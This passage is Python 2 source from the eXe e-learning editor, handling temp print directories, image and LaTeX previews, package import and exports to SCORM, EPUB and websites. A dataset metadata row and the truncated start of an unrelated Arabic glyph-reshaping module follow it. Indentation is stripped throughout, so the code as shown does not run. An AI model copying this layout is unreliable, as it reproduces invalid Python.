http_relative_pathname = "http://127.0.0.1:" + str(self.config.port) \
+ '/' + rel_name
log.debug('printdir http_relative_pathname=' + http_relative_pathname)
return http_relative_pathname
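    # Worked example (hypothetical paths): with G.application.tempWebDir set
    # to "/tmp/exe" and exported_dir "/tmp/exe/temp_print_dirs/job1", this
    # returns "http://127.0.0.1:<port>/temp_print_dirs/job1".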
def ClearParentTempPrintDirs(self, client, log_dir_warnings):
"""
Determine the parent temporary printing directory, and clear them
if safe to do so (i.e., if not the config dir itself, for example)
Makes (if necessary), and clears out (if applicable) the parent
temporary directory.
The calling handleClearAndMakeTempPrintDir() shall then make a
specific print-job subdirectory.
"""
#
# Create the parent temp print dir as hardcoded under the webdir, as:
# http://temp_print_dirs
# (eventually may want to allow this information to be configured by
# the user, stored in globals, etc.)
web_dirname = G.application.tempWebDir
under_dirname = os.path.join(web_dirname,"temp_print_dirs")
clear_tempdir = 0
dir_warnings = ""
# but first need to ensure that under_dirname itself is available;
# if not, create it:
if cmp(under_dirname,"") != 0:
if os.path.exists(under_dirname):
if (os.path.isdir(under_dirname)):
# Yes, this directory already exists.
# pre-clean it, keeping the clutter down:
clear_tempdir = 1
else:
dir_warnings = "WARNING: The desired Temporary Print " \
+ "Directory, \"" + under_dirname \
+ "\", already exists, but as a file!\n"
if log_dir_warnings:
log.warn("ClearParentTempPrintDirs(): The desired " \
+ "Temporary Print Directory, \"%s\", " \
+ "already exists, but as a file!", \
under_dirname)
under_dirname = web_dirname
# but, we can't just put the tempdirs directly underneath
# the webDir, since no server object exists for it.
# So, as a quick and dirty solution, go ahead and put
# them in the images folder:
under_dirname = os.path.join(under_dirname,"images")
dir_warnings += " RECOMMENDATION: please " \
+ "remove/rename this file to allow eXe easier "\
+ "management of its temporary print files.\n"
dir_warnings += " eXe will create the temporary " \
+ "printing directory directly under \"" \
+ under_dirname + "\" instead, but this might "\
+"leave some files around after eXe terminates..."
if log_dir_warnings:
log.warn(" RECOMMENDATION: please remove/rename "\
+ "this file to allow eXe easier management of "\
+ "its temporary print files.")
log.warn(" eXe will create the temporary " \
+ "printing directory directly under \"%s\" " \
+ "instead, but this might leave some files " \
+ "around after eXe terminates...", \
under_dirname)
# and note that we do NOT want to clear_tempdir
# on the config dir itself!!!!!
else:
os.makedirs(under_dirname)
# and while we could clear_tempdir on it, there's no need to.
if clear_tempdir :
# before making this particular print job's temporary print
# directory underneath the now-existing temp_print_dirs,
# go ahead and clear out temp_print_dirs such that we have
# AT MOST one old temporary set of print job files still existing
# once eXe terminates:
rm_topdir = "0"
# note: rm_topdir is passed in as a STRING since
# handleRemoveTempDir expects as such from nevow's
# clientToServerEvent() call:
self.handleRemoveTempDir(client, under_dirname, rm_topdir)
return under_dirname, dir_warnings
def handleClearAndMakeTempPrintDir(self, client, suffix, prefix, \
callback):
"""
Makes a temporary printing directory, and yup, that's pretty much it!
"""
# First get the name of the parent temp directory, after making it
# (if necessary) and clearing (if applicable):
log_dir_warnings = 1
(under_dirname, dir_warnings) = self.ClearParentTempPrintDirs( \
client, log_dir_warnings)
# Next, go ahead and create this particular print job's temporary
# directory under the parent temp directory:
temp_dir = mkdtemp(suffix, prefix, under_dirname)
# Finally, pass the created temp_dir back to the expecting callback:
client.call(callback, temp_dir, dir_warnings)
def handleTinyMCEimageChoice(self, client, tinyMCEwin, tinyMCEwin_name, \
tinyMCEfield, local_filename, preview_filename):
"""
Once an image is selected in the file browser that is spawned by the
TinyMCE image dialog, copy this file (which is local to the user's
machine) into the server space, under a preview directory
(after checking if this exists, and creating it if necessary).
Note that this IS a "cheat", in violation of the client-server
separation, but can be done since we know that the eXe server is
actually sitting on the client host.
"""
server_filename = ""
callback_errors = ""
errors = 0
log.debug('handleTinyMCEimageChoice: image local = ' + local_filename
+ ', base=' + os.path.basename(local_filename))
webDir = Path(G.application.tempWebDir)
previewDir = webDir.joinpath('previews')
if not previewDir.exists():
log.debug("image previews directory does not yet exist; " \
+ "creating as %s " % previewDir)
previewDir.makedirs()
elif not previewDir.isdir():
client.alert( \
_(u'Preview directory %s is a file, cannot replace it') \
% previewDir)
log.error("Couldn't preview tinyMCE-chosen image: "+
"Preview dir %s is a file, cannot replace it" \
% previewDir)
callback_errors = "Preview dir is a file, cannot replace"
errors += 1
if errors == 0:
log.debug('handleTinyMCEimageChoice: originally, local_filename='
+ local_filename)
local_filename = unicode(local_filename, 'utf-8')
log.debug('handleTinyMCEimageChoice: in unicode, local_filename='
+ local_filename)
localImagePath = Path(local_filename)
log.debug('handleTinyMCEimageChoice: after Path, localImagePath= '
+ localImagePath);
if not localImagePath.exists() or not localImagePath.isfile():
client.alert( \
_(u'Local file %s is not found, cannot preview it') \
% localImagePath)
log.error("Couldn't find tinyMCE-chosen image: %s" \
% localImagePath)
callback_errors = "Image file %s not found, cannot preview" \
% localImagePath
errors += 1
try:
# joinpath needs its join arguments to already be in Unicode:
#preview_filename = toUnicode(preview_filename);
# (not needed here: preview_filename arrives already URI-encoded)
log.debug('URIencoded preview filename=' + preview_filename);
server_filename = previewDir.joinpath(preview_filename);
log.debug("handleTinyMCEimageChoice copying image from \'"\
+ local_filename + "\' to \'" \
+ server_filename.abspath() + "\'.");
shutil.copyfile(local_filename, \
server_filename.abspath());
# new optional description file to provide the
# actual base filename, such that once it is later processed
# copied into the resources directory, it can be done with
# only the basename. Otherwise the resource filenames
# are too long for some users, preventing them from making
# backup CDs of the content, for example.
#
# Remember that the full path of the
# file is only used here as an easy way to keep the names
# unique WITHOUT requiring a roundtrip call from the Javascript
# to this server, and back again, a process which does not
# seem to work with tinyMCE in the mix. BUT, once tinyMCE's
# part is done, and this image processed, it can be returned
# to just its basename, since the resource parts have their
# own unique-ification mechanisms already in place.
descrip_file_path = Path(server_filename+".exe_info")
log.debug("handleTinyMCEimageChoice creating preview " \
+ "description file \'" \
+ descrip_file_path.abspath() + "\'.");
descrip_file = open(descrip_file_path, 'wb')
# safety measures against TinyMCE, otherwise it will
# later take ampersands and entity-escape them into '&amp;',
# and filenames with hash signs will not be found, etc.:
unspaced_filename = local_filename.replace(' ','_')
unhashed_filename = unspaced_filename.replace('#', '_num_')
unamped_local_filename = unhashed_filename.replace('&', '_and_')
log.debug("and setting new file basename as: "
+ unamped_local_filename);
my_basename = os.path.basename(unamped_local_filename)
descrip_file.write((u"basename="+my_basename).encode('utf-8'))
descrip_file.flush()
descrip_file.close()
except Exception, e:
client.alert(_('SAVE FAILED!\n%s') % str(e))
log.error("handleTinyMCEimageChoice unable to copy local image "\
+"file to server prevew, error = " + str(e))
raise
def handleTinyMCEmath(self, client, tinyMCEwin, tinyMCEwin_name, \
tinyMCEfield, latex_source, math_fontsize, \
preview_image_filename, preview_math_srcfile):
"""
Based off of handleTinyMCEimageChoice(),
handleTinyMCEmath() is similar in that it places a .gif math image
(and a corresponding .tex LaTeX source file) into the previews dir.
Rather than copying the image from a user-selected directory, though,
this routine actually generates the math image using mimetex.
"""
server_filename = ""
callback_errors = ""
errors = 0
webDir = Path(G.application.tempWebDir)
previewDir = webDir.joinpath('previews')
if not previewDir.exists():
log.debug("image previews directory does not yet exist; " \
+ "creating as %s " % previewDir)
previewDir.makedirs()
elif not previewDir.isdir():
client.alert( \
_(u'Preview directory %s is a file, cannot replace it') \
% previewDir)
log.error("Couldn't preview tinyMCE-chosen image: "+
"Preview dir %s is a file, cannot replace it" \
% previewDir)
callback_errors = "Preview dir is a file, cannot replace"
errors += 1
#if errors == 0:
# localImagePath = Path(local_filename)
# if not localImagePath.exists() or not localImagePath.isfile():
# client.alert( \
# _(u'Image file %s is not found, cannot preview it') \
# % localImagePath)
# log.error("Couldn't find tinyMCE-chosen image: %s" \
# % localImagePath)
# callback_errors = "Image file %s not found, cannot preview" \
# % localImagePath
# errors += 1
# the mimetex usage code was swiped from the Math iDevice:
if latex_source <> "":
# first write the latex_source out into the preview_math_srcfile,
# such that it can then be passed into the compile command:
math_filename = previewDir.joinpath(preview_math_srcfile)
math_filename_str = math_filename.abspath().encode('utf-8')
log.info("handleTinyMCEmath: using LaTeX source: " + latex_source)
log.debug("writing LaTeX source into \'" \
+ math_filename_str + "\'.")
math_file = open(math_filename, 'wb')
# do we need to append a \n here?:
math_file.write(latex_source)
math_file.flush()
math_file.close()
try:
use_latex_sourcefile = math_filename_str
tempFileName = compile(use_latex_sourcefile, math_fontsize, \
latex_is_file=True)
except Exception, e:
client.alert(_('MimeTeX compile failed!\n%s') % str(e))
log.error("handleTinyMCEmath unable to compile LaTeX using "\
+"mimetex, error = " + str(e))
raise
# copy the file into previews
server_filename = previewDir.joinpath(preview_image_filename);
log.debug("handleTinyMCEmath copying math image from \'"\
+ tempFileName + "\' to \'" \
+ server_filename.abspath().encode('utf-8') + "\'.");
shutil.copyfile(tempFileName, \
server_filename.abspath().encode('utf-8'));
# Delete the temp file made by compile
Path(tempFileName).remove()
return
def getResources(self,dirname,html,client):
Resources.cancel = False
self.importresources = Resources(dirname,self.package.findNode(client.currentNodeId),client)
# import cProfile
# import lsprofcalltree
# p = cProfile.Profile()
# p.runctx( "resources.insertNode()",globals(),locals())
# k = lsprofcalltree.KCacheGrind(p)
# data = open('exeprof.kgrind', 'w+')
# k.output(data)
# data.close()
self.importresources.insertNode([html.partition(dirname + os.sep)[2]])
def handleImport(self, client, importType, path, html=None):
if importType == 'html':
if (not html):
client.call('eXe.app.getController("Toolbar").importHtml2', path)
else:
d = threads.deferToThread(self.getResources, path, html, client)
d.addCallback(self.handleImportCallback, client)
d.addErrback(self.handleImportErrback, client)
client.call('eXe.app.getController("Toolbar").initImportProgressWindow', _(u'Importing HTML...'))
if importType.startswith('lom'):
try:
setattr(self.package, importType, lomsubs.parse(path))
client.call('eXe.app.getController("MainTab").lomImportSuccess', importType)
except Exception, e:
client.alert(_('LOM Metadata import FAILED!\n%s') % str(e))
def handleImportErrback(self, failure, client):
client.alert(_(u'Error importing HTML:\n') + unicode(failure.getBriefTraceback()), \
(u'eXe.app.gotoUrl("/%s")' % self.package.name).encode('utf8'), filter_func=otherSessionPackageClients)
def handleImportCallback(self,resources,client):
client.call('eXe.app.getController("Toolbar").closeImportProgressWindow')
client.sendScript((u'eXe.app.gotoUrl("/%s")' % \
self.package.name).encode('utf8'), filter_func=allSessionPackageClients)
def handleCancelImport(self, client):
log.info('Cancel import')
Resources.cancelImport()
def handleExport(self, client, exportType, filename):
"""
Called by js.
Exports the current package to one of the above formats
'exportType' can be one of 'singlePage' 'webSite' 'zipFile'
'textFile' or 'scorm'
'filename' is a file for scorm pages, and a directory for websites
"""
webDir = Path(self.config.webDir)
#stylesDir = webDir.joinpath('style', self.package.style)
stylesDir = self.config.stylesDir/self.package.style
filename = Path(filename, 'utf-8')
exportDir = Path(filename).dirname()
if exportDir and not exportDir.exists():
client.alert(_(u'Cannot access directory named ') +
unicode(exportDir) +
_(u'. Please use ASCII names.'))
return
"""
adding the print feature in using the same export functionality:
"""
if exportType == 'singlePage' or exportType == 'printSinglePage':
printit = 0
if exportType == 'printSinglePage':
printit = 1
exported_dir = self.exportSinglePage(client, filename, webDir, \
stylesDir, printit)
if printit == 1 and not exported_dir is None:
web_printdir = self.get_printdir_relative2web(exported_dir)
G.application.config.browser.open(web_printdir)
elif exportType == 'webSite':
self.exportWebSite(client, filename, stylesDir)
elif exportType == 'csvReport':
self.exportReport(client, filename, stylesDir)
elif exportType == 'zipFile':
filename = self.b4save(client, filename, '.zip', _(u'EXPORT FAILED!'))
self.exportWebZip(client, filename, stylesDir)
elif exportType == 'textFile':
self.exportText(client, filename)
elif exportType == 'scorm1.2':
filename = self.b4save(client, filename, '.zip', _(u'EXPORT FAILED!'))
self.exportScorm(client, filename, stylesDir, "scorm1.2")
elif exportType == "scorm2004":
filename = self.b4save(client, filename, '.zip', _(u'EXPORT FAILED!'))
self.exportScorm(client, filename, stylesDir, "scorm2004")
elif exportType == "agrega":
filename = self.b4save(client, filename, '.zip', _(u'EXPORT FAILED!'))
self.exportScorm(client, filename, stylesDir, "agrega")
elif exportType == 'epub3':
filename = self.b4save(client, filename, '.epub', _(u'EXPORT FAILED!'))
self.exportEpub3(client, filename, stylesDir)
elif exportType == "commoncartridge":
filename = self.b4save(client, filename, '.zip', _(u'EXPORT FAILED!'))
self.exportScorm(client, filename, stylesDir, "commoncartridge")
elif exportType == 'mxml':
self.exportXML(client, filename, stylesDir)
else:
filename = self.b4save(client, filename, '.zip', _(u'EXPORT FAILED!'))
self.exportIMS(client, filename, stylesDir)
def handleQuit(self, client):
"""
Stops the server
"""
# first, go ahead and clear out any temp job files still in
# the temporary print directory:
log_dir_warnings = 0
# don't warn of any issues with the directories at quit,
# since already warned at initial directory creation
(parent_temp_print_dir, dir_warnings) = \
self.ClearParentTempPrintDirs(client, log_dir_warnings)
client.close("window.location = \"quit\";")
if len(self.clientHandleFactory.clientHandles) <= 1:
self.webServer.monitoring = False
G.application.config.configParser.set('user', 'lastDir', G.application.config.lastDir)
try:
shutil.rmtree(G.application.tempWebDir, True)
shutil.rmtree(G.application.resourceDir, True)
except:
log.debug('Could not delete temp directories.')
reactor.callLater(2, reactor.stop)
else:
log.debug("Not quiting. %d clients alive." % len(self.clientHandleFactory.clientHandles))
def handleBrowseURL(self, client, url):
"""visit the specified URL using the system browser
if the URL contains %s, substitute the local webDir
if the URL contains %t, show a temp file containing NEWS and README """
if url.find('%t') > -1:
release_notes = os.path.join(G.application.tempWebDir,
'Release_Notes.html')
f = open(release_notes, 'wt')
f.write('''<html><head><title>eXe Release Notes</title></head>
<body><h1>News</h1><pre>\n''')
try:
news = open(os.path.join(self.config.webDir, 'NEWS'),
'rt').read()
readme = open(os.path.join(self.config.webDir, 'README'),
'rt').read()
f.write(news)
f.write('</pre><hr><h1>Read Me</h1><pre>\n')
f.write(readme)
except IOError:
# fail silently if we can't read either of the files
pass
f.write('</pre></body></html>')
f.close()
url = url.replace('%t', release_notes)
else:
url = url.replace('%s', self.config.webDir)
log.debug(u'browseURL: ' + url)
if hasattr(os, 'startfile'):
os.startfile(url)
else:
G.application.config.browser.open(url, new=True)
def handleMergeXliffPackage(self, client, filename, from_source):
"""
Parse the XLIFF file and import the contents based on
translation-unit id-s
"""
from_source = True if from_source == "true" else False
try:
importer = XliffImport(self.package, unquote(filename))
importer.parseAndImport(from_source)
client.alert(_(u'Correct XLIFF import'), (u'eXe.app.gotoUrl("/%s")' % \
self.package.name).encode('utf8'), filter_func=otherSessionPackageClients)
except Exception,e:
client.alert(_(u'Error importing XLIFF: %s') % e, (u'eXe.app.gotoUrl("/%s")' % \
self.package.name).encode('utf8'), filter_func=otherSessionPackageClients)
def handleInsertPackage(self, client, filename):
"""
Load the package and insert in current node
"""
package = self._loadPackage(client, filename, newLoad=True)
tmpfile = Path(tempfile.mktemp())
package.save(tmpfile)
loadedPackage = self._loadPackage(client, tmpfile, newLoad=False,
destinationPackage=self.package)
newNode = loadedPackage.root.copyToPackage(self.package,
self.package.currentNode)
# trigger a rename of all of the internal nodes and links,
# and to add any such anchors into the dest package via isMerge:
newNode.RenamedNodePath(isMerge=True)
try:
tmpfile.remove()
except:
pass
client.sendScript((u'eXe.app.gotoUrl("/%s")' % \
self.package.name).encode('utf8'), filter_func=allSessionPackageClients)
def handleExtractPackage(self, client, filename, existOk):
"""
Create a new package consisting of the current node and export
'existOk' means the user has been informed of existence and OK'd it
"""
filename = Path(filename, 'utf-8')
saveDir = filename.dirname()
if saveDir and not saveDir.exists():
client.alert(_(u'Cannot access directory named ') + unicode(saveDir) + _(u'. Please use ASCII names.'))
return
# Add the extension if its not already there
if not filename.lower().endswith('.elp'):
filename += '.elp'
if Path(filename).exists() and existOk != 'true':
msg = _(u'"%s" already exists.\nPlease try again with a different filename') % filename
client.alert(_(u'EXTRACT FAILED!\n%s') % msg)
return
try:
# Create a new package for the extracted nodes
newPackage = self.package.extractNode()
# trigger a rename of all of the internal nodes and links,
# and to remove any old anchors from the dest package,
# and remove any zombie links via isExtract:
newNode = newPackage.root
if newNode:
newNode.RenamedNodePath(isExtract=True)
# Save the new package
newPackage.save(filename)
except Exception, e:
client.alert(_('EXTRACT FAILED!\n%s') % str(e))
raise
client.alert(_(u'Package extracted to: %s') % filename)
def handleCreateDir(self, client, currentDir, newDir):
try:
d = Path(currentDir, 'utf-8') / newDir
d.makedirs()
client.sendScript(u"""eXe.app.getStore('filepicker.DirectoryTree').load({
callback: function() {
eXe.app.fireEvent( "dirchange", %s );
}
})""" % json.dumps(d))
except OSError:
client.alert(_(u"Directory exists"))
except:
log.exception("")
# Public Methods
"""
Exports to Ustad Mobile XML
"""
def exportXML(self, client, filename, stylesDir):
try:
xmlExport = XMLExport(self.config, stylesDir, filename)
xmlExport.export(self.package)
except Exception, e:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
def exportSinglePage(self, client, filename, webDir, stylesDir, \
printFlag):
"""
Export 'client' to a single web page,
'webDir' is just read from config.webDir
'stylesDir' is where to copy the style sheet information from
'printFlag' indicates whether or not this is for print
(and whatever else that might mean)
"""
try:
imagesDir = webDir.joinpath('images')
scriptsDir = webDir.joinpath('scripts')
cssDir = webDir.joinpath('css')
templatesDir = webDir.joinpath('templates')
# filename is a directory where we will export the website to
# We assume that the user knows what they are doing
# and don't check if the directory is already full or not
# and we just overwrite what's already there
filename = Path(filename)
# Append the package name to the folder path if necessary
if filename.basename() != self.package.name:
filename /= self.package.name
if not filename.exists():
filename.makedirs()
elif not filename.isdir():
client.alert(_(u'Filename %s is a file, cannot replace it') %
filename)
log.error("Couldn't export web page: "+
"Filename %s is a file, cannot replace it" % filename)
return
else:
client.alert(_(u'Folder name %s already exists. '
'Please choose another one or delete existing one then try again.') % filename)
return
# Now do the export
singlePageExport = SinglePageExport(stylesDir, filename, \
imagesDir, scriptsDir, cssDir, templatesDir)
singlePageExport.export(self.package, printFlag)
except Exception, e:
client.alert(_('SAVE FAILED!\n%s') % str(e))
raise
# Show the newly exported web site in a new window
if not printFlag:
self._startFile(filename)
if client:
client.alert(_(u'Exported to %s') % filename)
# and return a string of the actual directory name,
# in case the package name was added, etc.:
return filename.abspath().encode('utf-8')
def exportWebSite(self, client, filename, stylesDir):
"""
Export the current package to a web site,
'webDir' is just read from config.webDir
'stylesDir' is where to copy the style sheet information from
"""
try:
# filename is a directory where we will export the website to
# We assume that the user knows what they are doing
# and don't check if the directory is already full or not
# and we just overwrite what's already there
filename = Path(filename)
# Append the package name to the folder path if necessary
if filename.basename() != self.package.name:
filename /= self.package.name
if not filename.exists():
filename.makedirs()
elif not filename.isdir():
if client:
client.alert(_(u'Filename %s is a file, cannot replace it') %
filename)
log.error("Couldn't export web page: "+
"Filename %s is a file, cannot replace it" % filename)
return
else:
if client:
client.alert(_(u'Folder name %s already exists. '
'Please choose another one or delete existing one then try again.') % filename)
return
# Now do the export
websiteExport = WebsiteExport(self.config, stylesDir, filename)
websiteExport.export(self.package)
except Exception, e:
if client:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
if client:
client.alert(_(u'Exported to %s') % filename)
# Show the newly exported web site in a new window
self._startFile(filename)
def exportWebZip(self, client, filename, stylesDir):
try:
log.debug(u"exportWebsite, filename=%s" % filename)
filename = Path(filename)
# Do the export
filename = self.b4save(client, filename, '.zip', _(u'EXPORT FAILED!'))
websiteExport = WebsiteExport(self.config, stylesDir, filename)
websiteExport.exportZip(self.package)
except Exception, e:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
client.alert(_(u'Exported to %s') % filename)
def exportText(self, client, filename):
try:
filename = Path(filename)
log.debug(u"exportWebsite, filename=%s" % filename)
# Append an extension if required
if not filename.lower().endswith('.txt'):
filename += '.txt'
if Path(filename).exists():
msg = _(u'"%s" already exists.\nPlease try again with a different filename') % filename
client.alert(_(u'EXPORT FAILED!\n%s') % msg)
return
# Do the export
textExport = TextExport(filename)
textExport.export(self.package)
except Exception, e:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
client.alert(_(u'Exported to %s') % filename)
def handleXliffExport(self, client, filename, source, target, copy, cdata):
"""
Exports this package to a XLIFF file
"""
copy = True if copy == "true" else False
cdata = True if cdata == "true" else False
try:
filename = Path(unquote(filename))
log.debug(u"exportXliff, filename=%s" % filename)
if not filename.lower().endswith('.xlf'):
filename += '.xlf'
xliffExport = XliffExport(self.config, filename, source, target, copy, cdata)
xliffExport.export(self.package)
except Exception,e:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
client.alert(_(u'Exported to %s') % filename)
def exportScorm(self, client, filename, stylesDir, scormType):
"""
Exports this package to a scorm package file
"""
try:
filename = Path(filename)
log.debug(u"exportScorm, filename=%s" % filename)
# Append an extension if required
if not filename.lower().endswith('.zip'):
filename += '.zip'
if Path(filename).exists():
msg = _(u'"%s" already exists.\nPlease try again with a different filename') % filename
client.alert(_(u'EXPORT FAILED!\n%s') % msg)
return
# Do the export
scormExport = ScormExport(self.config, stylesDir, filename, scormType)
scormExport.export(self.package)
except Exception, e:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
client.alert(_(u'Exported to %s') % filename)
def exportEpub3(self, client, filename, stylesDir):
try:
log.debug(u"exportEpub3, filename=%s" % filename)
filename = Path(filename)
# Do the export
filename = self.b4save(client, filename, '.epub', _(u'EXPORT FAILED!'))
epub3Export = Epub3Export(self.config, stylesDir, filename)
epub3Export.export(self.package)
# epub3Export.exportZip(self.package)
except Exception, e:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
client.alert(_(u'Exported to %s') % filename)
def exportReport(self, client, filename, stylesDir):
"""
Generates this package report to a file
"""
try:
log.debug(u"exportReport")
# Append an extension if required
if not filename.lower().endswith('.csv'):
filename += '.csv'
if Path(filename).exists():
msg = _(u'"%s" already exists.\nPlease try again with a different filename') % filename
client.alert(_(u'EXPORT FAILED!\n%s') % msg)
return
# Do the export
websiteExport = WebsiteExport(self.config, stylesDir, filename, report=True)
websiteExport.export(self.package)
except Exception, e:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
client.alert(_(u'Exported to %s') % filename)
def exportIMS(self, client, filename, stylesDir):
"""
Exports this package to a ims package file
"""
try:
log.debug(u"exportIMS")
# Append an extension if required
if not filename.lower().endswith('.zip'):
filename += '.zip'
if Path(filename).exists():
msg = _(u'"%s" already exists.\nPlease try again with a different filename') % filename
client.alert(_(u'EXPORT FAILED!\n%s') % msg)
return
# Do the export
imsExport = IMSExport(self.config, stylesDir, filename)
imsExport.export(self.package)
except Exception, e:
client.alert(_('EXPORT FAILED!\n%s') % str(e))
raise
client.alert(_(u'Exported to %s') % filename)
# Utility methods
def _startFile(self, filename):
"""
Launches an exported web site or page
"""
if hasattr(os, 'startfile'):
try:
os.startfile(filename)
except UnicodeEncodeError:
os.startfile(filename.encode(Path.fileSystemEncoding))
else:
filename /= 'index.html'
G.application.config.browser.open('file://'+filename)
def _loadPackage(self, client, filename, newLoad=True,
destinationPackage=None):
"""Load the package named 'filename'"""
try:
encoding = sys.getfilesystemencoding()
if encoding is None:
encoding = 'utf-8'
filename2 = toUnicode(filename, encoding)
log.debug("filename and path" + filename2)
# see if the file exists AND is readable by the user
try:
open(filename2, 'rb').close()
except IOError:
filename2 = toUnicode(filename, 'utf-8')
try:
open(filename2, 'rb').close()
except IOError:
client.alert(_(u'File %s does not exist or is not readable.') % filename2)
return None
package = Package.load(filename2, newLoad, destinationPackage)
if package is None:
raise Exception(_("Couldn't load file, please email file to bugs@exelearning.org"))
except Exception, exc:
if log.getEffectiveLevel() == logging.DEBUG:
client.alert(_(u'Sorry, wrong file format:\n%s') % unicode(exc))
else:
client.alert(_(u'Sorry, wrong file format'))
log.error(u'Error loading package "%s": %s' % (filename2, unicode(exc)))
log.error(u'Traceback:\n%s' % traceback.format_exc())
raise
return package
|
tquilian/exeNext
|
exe/jsui/mainpage.py
|
Python
|
gpl-2.0
| 57,162
|
[
"VisIt"
] |
5d8a17fb4f42e47afeda4cdd1eb57a603fc4c27e8264e3c9fdac67e3ee9e2b94
|
# -*- coding: utf-8 -*-
# Ported and tweaked from Java to Python, from Better Arabic Reshaper [https://github.com/agawish/Better-Arabic-Reshaper/]
# This work is licensed under the GNU Public License (GPL).
# To view a copy of this license, visit http://www.gnu.org/copyleft/gpl.html
# Written by Abd Allah Diab (mpcabd)
# Written by faisal oead
import re
DEFINED_CHARACTERS_ORGINAL_ALF_UPPER_MDD = u'\u0622'
DEFINED_CHARACTERS_ORGINAL_ALF_UPPER_HAMAZA = u'\u0623'
DEFINED_CHARACTERS_ORGINAL_ALF_LOWER_HAMAZA = u'\u0625'
DEFINED_CHARACTERS_ORGINAL_ALF = u'\u0627'
DEFINED_CHARACTERS_ORGINAL_LAM = u'\u0644'
LAM_ALEF_GLYPHS = [
[u'\u0622', u'\uFEF6', u'\uFEF5'],
[u'\u0623', u'\uFEF8', u'\uFEF7'],
[u'\u0627', u'\uFEFC', u'\uFEFB'],
[u'\u0625', u'\uFEFA', u'\uFEF9']
]
HARAKAT = [
u'\u0600', u'\u0601', u'\u0602', u'\u0603', u'\u0606', u'\u0607', u'\u0608', u'\u0609',
u'\u060A', u'\u060B', u'\u060D', u'\u060E', u'\u0610', u'\u0611', u'\u0612', u'\u0613',
u'\u0614', u'\u0615', u'\u0616', u'\u0617', u'\u0618', u'\u0619', u'\u061A', u'\u061B',
u'\u061E', u'\u061F', u'\u0621', u'\u063B', u'\u063C', u'\u063D', u'\u063E', u'\u063F',
u'\u0640', u'\u064B', u'\u064C', u'\u064D', u'\u064E', u'\u064F', u'\u0650', u'\u0651',
u'\u0652', u'\u0653', u'\u0654', u'\u0655', u'\u0656', u'\u0657', u'\u0658', u'\u0659',
u'\u065A', u'\u065B', u'\u065C', u'\u065D', u'\u065E', u'\u0660', u'\u066A', u'\u066B',
u'\u066C', u'\u066F', u'\u0670', u'\u0672', u'\u06D4', u'\u06D5', u'\u06D6', u'\u06D7',
u'\u06D8', u'\u06D9', u'\u06DA', u'\u06DB', u'\u06DC', u'\u06DF', u'\u06E0', u'\u06E1',
u'\u06E2', u'\u06E3', u'\u06E4', u'\u06E5', u'\u06E6', u'\u06E7', u'\u06E8', u'\u06E9',
u'\u06EA', u'\u06EB', u'\u06EC', u'\u06ED', u'\u06EE', u'\u06EF', u'\u06D6', u'\u06D7',
u'\u06D8', u'\u06D9', u'\u06DA', u'\u06DB', u'\u06DC', u'\u06DD', u'\u06DE', u'\u06DF',
u'\u06F0', u'\u06FD', u'\uFE70', u'\uFE71', u'\uFE72', u'\uFE73', u'\uFE74', u'\uFE75',
u'\uFE76', u'\uFE77', u'\uFE78', u'\uFE79', u'\uFE7A', u'\uFE7B', u'\uFE7C', u'\uFE7D',
u'\uFE7E', u'\uFE7F', u'\uFC5E', u'\uFC5F', u'\uFC60', u'\uFC61', u'\uFC62', u'\uFC63'
]
ARABIC_GLYPHS = {
u'\u0622' : [u'\u0622', u'\uFE81', u'\uFE81', u'\uFE82', u'\uFE82', 2],
u'\u0623' : [u'\u0623', u'\uFE83', u'\uFE83', u'\uFE84', u'\uFE84', 2],
u'\u0624' : [u'\u0624', u'\uFE85', u'\uFE85', u'\uFE86', u'\uFE86', 2],
u'\u0625' : [u'\u0625', u'\uFE87', u'\uFE87', u'\uFE88', u'\uFE88', 2],
u'\u0626' : [u'\u0626', u'\uFE89', u'\uFE8B', u'\uFE8C', u'\uFE8A', 4],
u'\u0627' : [u'\u0627', u'\u0627', u'\u0627', u'\uFE8E', u'\uFE8E', 2],
u'\u0628' : [u'\u0628', u'\uFE8F', u'\uFE91', u'\uFE92', u'\uFE90', 4],
u'\u0629' : [u'\u0629', u'\uFE93', u'\uFE93', u'\uFE94', u'\uFE94', 2],
u'\u062A' : [u'\u062A', u'\uFE95', u'\uFE97', u'\uFE98', u'\uFE96', 4],
u'\u062B' : [u'\u062B', u'\uFE99', u'\uFE9B', u'\uFE9C', u'\uFE9A', 4],
u'\u062C' : [u'\u062C', u'\uFE9D', u'\uFE9F', u'\uFEA0', u'\uFE9E', 4],
u'\u062D' : [u'\u062D', u'\uFEA1', u'\uFEA3', u'\uFEA4', u'\uFEA2', 4],
u'\u062E' : [u'\u062E', u'\uFEA5', u'\uFEA7', u'\uFEA8', u'\uFEA6', 4],
u'\u062F' : [u'\u062F', u'\uFEA9', u'\uFEA9', u'\uFEAA', u'\uFEAA', 2],
u'\u0630' : [u'\u0630', u'\uFEAB', u'\uFEAB', u'\uFEAC', u'\uFEAC', 2],
u'\u0631' : [u'\u0631', u'\uFEAD', u'\uFEAD', u'\uFEAE', u'\uFEAE', 2],
u'\u0632' : [u'\u0632', u'\uFEAF', u'\uFEAF', u'\uFEB0', u'\uFEB0', 2],
u'\u0633' : [u'\u0633', u'\uFEB1', u'\uFEB3', u'\uFEB4', u'\uFEB2', 4],
u'\u0634' : [u'\u0634', u'\uFEB5', u'\uFEB7', u'\uFEB8', u'\uFEB6', 4],
u'\u0635' : [u'\u0635', u'\uFEB9', u'\uFEBB', u'\uFEBC', u'\uFEBA', 4],
u'\u0636' : [u'\u0636', u'\uFEBD', u'\uFEBF', u'\uFEC0', u'\uFEBE', 4],
u'\u0637' : [u'\u0637', u'\uFEC1', u'\uFEC3', u'\uFEC4', u'\uFEC2', 4],
u'\u0638' : [u'\u0638', u'\uFEC5', u'\uFEC7', u'\uFEC8', u'\uFEC6', 4],
u'\u0639' : [u'\u0639', u'\uFEC9', u'\uFECB', u'\uFECC', u'\uFECA', 4],
u'\u063A' : [u'\u063A', u'\uFECD', u'\uFECF', u'\uFED0', u'\uFECE', 4],
u'\u0641' : [u'\u0641', u'\uFED1', u'\uFED3', u'\uFED4', u'\uFED2', 4],
u'\u0642' : [u'\u0642', u'\uFED5', u'\uFED7', u'\uFED8', u'\uFED6', 4],
